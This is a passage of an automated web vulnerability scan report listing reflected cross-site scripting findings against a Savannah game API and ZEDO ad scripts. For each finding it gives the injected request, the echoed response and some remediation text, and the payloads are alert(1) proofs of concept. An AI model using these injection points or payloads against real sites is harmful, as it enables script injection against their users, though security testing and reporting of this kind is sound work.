This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection?attribute_friendly_id=bdm-quest-active&max_records=1&order_by=-relative_weight&verbosity=9&callback=jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb&_=1315849741736 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 22597
Connection: keep-alive

jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb({
"content": [
[
{
"end_user_description": "Learn about SavannahNow.com!",
"read_only": 0,
"modified_timestamp": 1313094859,

...[SNIP]...

2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356 was submitted in the REST URL parameter 8. This input was echoed as 239ba<img src=a onerror=alert(1)>b848b762356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:51:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6912
Connection: keep-alive

jQuery16204978716284967959_1315849731750({
"content": [
{
"transaction_group_id": "e4585ae6dd3d11e09e70a1d588d6b83a",
"end_user": {
"read_only": 0,

...[SNIP]...
"end_user_title": "Checkin-SavannahNow"
}
],
"created_timestamp": 1315831871,
"end_user_login": "1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img src=a onerror=alert(1)>b848b762356",
"level_summaries": [
{
"end_user_description": "You've earned Savannah Bucks just for visiting this page! Log in to keep your Bucks and re
...[SNIP]...

2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 448ee<script>alert(1)</script>ac7a6816012 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 457
Connection: keep-alive

jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012({
"content": "3",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase":
...[SNIP]...

2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e412'%3balert(1)//85a26cf6ed2 was submitted in the $ parameter. This input was echoed as 8e412';alert(1)//85a26cf6ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8e412'%3balert(1)//85a26cf6ed2&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 631
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8e412';alert(1)//85a26cf6ed2,746f2';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8e412';alert(1)//85a26cf6ed2,746f2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8e412';alert(1)//85a26cf6ed2,746f2';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb91"%3balert(1)//bc21aa44290 was submitted in the $ parameter. This input was echoed as feb91";alert(1)//bc21aa44290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=feb91"%3balert(1)//bc21aa44290&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:feb91";alert(1)//bc21aa44290,c46b4";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,232825,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,14#0,120:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6383
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='feb91";alert(1)//bc21aa44290,c46b4"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=feb91";alert(1)//bc21aa44290,c46b4";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                                                                                                           
...[SNIP]...

2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290ab'%3balert(1)//ed469f36d1b was submitted in the q parameter. This input was echoed as 290ab';alert(1)//ed469f36d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=290ab'%3balert(1)//ed469f36d1b&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e91
...[SNIP]...

2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7baf9"%3balert(1)//41b4507dc6c was submitted in the q parameter. This input was echoed as 7baf9";alert(1)//41b4507dc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=7baf9"%3balert(1)//41b4507dc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;



...[SNIP]...

2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f500"%3balert(1)//a377cf4d1f4 was submitted in the $ parameter. This input was echoed as 8f500";alert(1)//a377cf4d1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8f500"%3balert(1)//a377cf4d1f4&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8f500";alert(1)//a377cf4d1f4,21990";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8f500";alert(1)//a377cf4d1f4,21990"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8f500";alert(1)//a377cf4d1f4,21990";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


               

2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 349bc'%3balert(1)//f49a54755fd was submitted in the $ parameter. This input was echoed as 349bc';alert(1)//f49a54755fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=349bc'%3balert(1)//f49a54755fd&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:349bc';alert(1)//f49a54755fd,e304a';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='349bc';alert(1)//f49a54755fd,e304a'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=349bc';alert(1)//f49a54755fd,e304a';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b1f'%3balert(1)//4f2061d893a was submitted in the q parameter. This input was echoed as b9b1f';alert(1)//4f2061d893a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

